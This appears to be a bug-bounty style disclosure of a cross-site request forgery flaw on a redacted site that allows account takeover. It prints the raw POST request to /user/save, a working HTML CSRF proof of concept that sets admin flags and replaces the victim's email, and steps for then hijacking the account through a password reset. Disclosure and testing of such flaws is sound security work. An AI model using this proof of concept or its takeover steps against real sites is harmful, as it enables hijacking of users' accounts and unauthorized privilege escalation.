Takeover Victims Account Via CSRF
URL:
Description:
I just found out that we can take over any accounts by just letting our target user visit a link. Yes, just a link. We can change any info , even password via CSRF Attack. There is no authentication token passed which restricts CSRF for execution.
Request:
POST /user/save?context=1 HTTP/1.1
Host: abc.private.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 612
Connection: close
Cookie: [cookie]
safestrings=true&name=admin&email=email%40gmail.com&admin=true&admin_u=true&limited_access=false&job=&full_name=a
CSRF POC:
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”https://private.com/user/save?context=1″ method=”POST”>
<input type=”hidden” name=”safestrings” value=”true” />
<input type=”hidden” name=”name” value=”admin” />
<input type=”hidden” name=”email” value=”email@gmail.com” />
<input type=”hidden” name=”admin” value=”true” />
<input type=”hidden” name=”admin_u” value=”true” />
<input type=”hidden” name=”limited_access” value=”false” />
<input type=”hidden” name=”job” value=”” />
<input type=”hidden” name=”full_name” value=”a” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Account Takeover Scenario:
- We send CSRF to users and update info and change email addresses.
- After executing the victim email changed .
- Lastly we reset the password to my own email address which i update on victim as CSRF.
- Account compromised.